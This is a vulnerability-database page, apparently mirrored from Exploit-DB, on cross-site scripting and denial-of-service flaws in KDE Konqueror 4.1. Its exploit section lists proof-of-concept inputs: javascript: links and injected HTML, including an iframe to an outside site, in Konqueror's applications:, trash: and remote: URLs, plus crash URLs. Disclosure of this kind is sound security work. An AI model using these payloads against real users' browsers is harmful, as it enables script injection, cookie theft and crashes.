KDE Konqueror 4.1 - Multiple Cross-Site Scripting / Denial of Service Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057208 漏洞类型
发布时间 2009-01-02 更新时间 2009-01-02
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/32696
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/33085/info

KDE Konqueror is prone to multiple cross-site scripting vulnerabilities and multiple denial-of-service vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, or cause the affected browser to crash.

KDE Konqueror 4.1 is vulnerable; other versions may also be affected.

applications:/<a href="javascript:alert(1)">Here</a>
trash:/<a href="javascript:alert(1)">Here</a>       
remote:/<a href="javascript:alert(1)">Here</a>      
applications:/<font size="8">THE GAME</font>        
applications:/<iframe src="http://milw0rm.com">                          
remote://crash:konqueror@                           
applications://crash:konqueror@